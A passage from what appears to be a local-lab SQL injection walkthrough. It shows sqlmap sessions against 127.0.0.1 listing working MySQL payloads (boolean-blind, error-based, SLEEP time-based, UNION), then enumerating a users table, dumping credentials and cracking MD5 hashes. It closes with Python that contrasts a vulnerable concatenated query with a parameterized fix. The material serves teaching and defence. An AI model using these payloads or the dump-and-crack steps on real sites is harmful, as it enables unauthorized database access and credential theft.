    Payload: id=46 AND 3601=3601

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:20:00] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:20:00] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:20:00] [WARNING] your sqlmap version is outdated

[*] ending @ 17:20:00 /2024-01-28/

D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46 -D news -T news_users --columns
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:20:28 /2024-01-28/

[17:20:28] [INFO] resuming back-end DBMS 'mysql'
[17:20:28] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=46 AND 3601=3601

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:20:30] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:20:30] [INFO] fetching columns for table 'news_users' in database 'news'
[17:20:37] [WARNING] the SQL query provided does not return any output
[17:20:37] [INFO] resumed: 'userid'
[17:20:37] [INFO] resumed: 'int(11)'
[17:20:37] [INFO] resumed: 'username'
[17:20:37] [INFO] resumed: 'varchar(20)'
[17:20:37] [INFO] resumed: 'password'
[17:20:37] [INFO] resumed: 'varchar(32)'
Database: news
Table: news_users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
| userid   | int(11)     |
| username | varchar(20) |
+----------+-------------+

[17:20:37] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:20:37] [WARNING] your sqlmap version is outdated

[*] ending @ 17:20:37 /2024-01-28/

D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46 -D news -T news_users -C username,password --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [(]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:20:55 /2024-01-28/

[17:20:56] [INFO] resuming back-end DBMS 'mysql'
[17:20:56] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=46 AND 3601=3601

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:20:58] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:20:58] [INFO] fetching entries of column(s) 'password,username' for table 'news_users' in database 'news'
[17:21:05] [WARNING] the SQL query provided does not return any output
[17:21:05] [INFO] resumed: 'e10adc3949ba59abbe56e057f20f883e'
[17:21:05] [INFO] resumed: 'admin'
[17:21:05] [INFO] resumed: 'e10adc3949ba59abbe56e057f20f883e'
[17:21:05] [INFO] resumed: '我是李四'
[17:21:05] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[17:21:13] [INFO] writing hashes to a temporary file 'c:\users\mzfait~1\appdata\local\temp\sqlmap9ektlv2308\sqlmaphashes-zlpi7u.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[17:21:17] [INFO] using hash method 'md5_generic_passwd'
[17:21:17] [INFO] resuming password '123456' for hash 'e10adc3949ba59abbe56e057f20f883e' for user 'admin'
Database: news
Table: news_users
[2 entries]
+----------+-------------------------------------------+
| username | password                                  |
+----------+-------------------------------------------+
| admin    | e10adc3949ba59abbe56e057f20f883e (123456) |
| 我是李四 | e10adc3949ba59abbe56e057f20f883e (123456) |
+----------+-------------------------------------------+

[17:21:17] [INFO] table 'news.news_users' dumped to CSV file 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1\dump\news\news_users.csv'
[17:21:17] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:21:17] [WARNING] your sqlmap version is outdated

[*] ending @ 17:21:17 /2024-01-28/

D:\sqlmap>
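Why the sessions above succeed and what closes the hole, as an added example that is not code from the original article. It assumes show.php builds its query by concatenating the id parameter (the page does not show its source) and uses an in-memory SQLite table as a constructed stand-in for the lab's MySQL news database; all function names are this example's own.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the lab's news database (SQLite, not MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news_article (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO news_article VALUES (46, 'constructed sample article')")
    return db


def show_vulnerable(db, raw_id):
    """Assumed flaw: the request value becomes part of the SQL text itself."""
    sql = "SELECT id, title FROM news_article WHERE id = " + raw_id
    return db.execute(sql).fetchall()


def show_hardened(db, raw_id):
    """Accept only a plain decimal id, then bind it as data, never as SQL."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a decimal integer")
    sql = "SELECT id, title FROM news_article WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()


# Values for the id parameter. "boolean true" is the payload sqlmap reported;
# "boolean false" and "union marker" are constructed variants of the reported
# boolean-based and UNION payloads, cut down to fit the two-column sample table.
INPUTS = {
    "normal": "46",
    "boolean true": "46 AND 3601=3601",
    "boolean false": "46 AND 3601=3602",
    "union marker": "-2063 UNION ALL SELECT NULL,'constructed-marker'",
}


def compare(db):
    """Run every input through both handlers: name -> (vulnerable, hardened)."""
    results = {}
    for name, raw_id in INPUTS.items():
        try:
            hardened = show_hardened(db, raw_id)
        except ValueError:
            hardened = "rejected"
        results[name] = (show_vulnerable(db, raw_id), hardened)
    return results


if __name__ == "__main__":
    for name, (vulnerable, hardened) in compare(make_db()).items():
        print(f"{name:14} vulnerable={vulnerable!r} hardened={hardened!r}")
```

In the vulnerable handler the true and false conditions return different pages, which is the signal a boolean-based blind test relies on, and the UNION input returns a row the table never held; the hardened handler rejects all three and serves only the plain id.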
